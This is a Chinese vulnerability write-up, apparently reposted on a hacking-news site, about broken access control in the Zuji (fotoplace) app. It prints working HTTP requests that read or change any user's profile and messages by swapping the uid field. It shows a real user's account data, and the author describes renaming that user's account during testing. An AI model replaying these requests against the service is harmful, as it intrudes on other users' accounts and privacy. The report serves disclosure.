记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

足记APP 多处越权

2015-11-06 02:05

老套路 启动应用 抓包,发现多处平行权限,这里看几个比较重要的

平行权限就是:我是用户A,我却能操作用户B的信息,在本例中B是任意用户,也就是我能操作任意用户的信息,包括察看修改。

0x0 篡改任意用户信息 (我都能篡改任意用户的信息了,这还不算"有效的危害证明"吗?)

在手机中修改自己的信息然后抓包,修改其中的UID字段就能随便修改目标用户的信息

随便找一个目标用户ID:19210912(这个不是我的帐号,是从推荐用户里选的一个)修改效果如图,因为修改之前没有截图,这个用户本来的头像是一个女生,名字也被我篡改了。

Screenshot.png

(一不小心把妹子名字改成了,当时只是测试,没想到这个漏洞真存在,不然肯定不会改人家名字"let_high")


{"data":{"albumCount":"0","allowFound":"1","avatar":"http://dn.fotoplace.cc/81622e8a4c414ffc998073f3c16158bb.jpg","city":"0","createAt":"1429614690000","description":"随便写点什么吧","followerCount":"4606","followingCount":"6","gender":"","isFollowing":"1","likeCount":"29","location":"","newCommentCount":"1","newLikeCount":"49","newMessageCount":"0","newMsgCount":"0","newNoticeCount":"0","newNotifyCount":"6","newTotalCount":"56","postCount":"102","stopbyCount":"0","tagCount":"0","uid":"19210912","userName":"let_high","userSkin":"http://dn.fotoplace.cc/fp3811265.jpg-mb?t=314098","wishCount":"0"},"error":"","status":"0"}


0x1 查询任意用户消息数目(我都能察看任意用户的消息数目了,这还不算"有效的可利用的敏感信息泄露"吗?)

数据包内容如下 


POST /api2/user/user_message_count.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Host: www.fotoplace.cc Connection: Keep-Alive Accept-Encoding: gzip Content-Length: 95 uid=<目标用户ID>&token=<任意合法用户token>&version=2.9


仍然以刚才的妹子为例子 


{"data":{"newCommentCount":"1","newLikeCount":"49","newNoticeCount":"0","newNotifyCount":"6","newTotalCount":"56"},"error":"","status":"0"}

可以看到这个妹子的系统消息或者是个人消息的数目.


0x2 查询任意用户消息内容(我都能察看任意用户的消息内容了,这还不算"有效的可利用的敏感信息泄露"吗?)

数据包如下:


POST /api2/user/user_get_notice_list.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Host: www.fotoplace.cc Connection: Keep-Alive Accept-Encoding: gzip Content-Length: 107 version=2.9&uid=<目标用户ID>&token=<任意合法用户token>&pageindex=0


这里就是能看到上一步中的妹子的那些消息的具体内容,因为这里可能涉及到隐私,所有不方便展示效果.

解决方案:

完善权限管理

知识来源: www.2cto.com/Article/201511/448730.html

阅读:64808 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“足记APP 多处越权”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词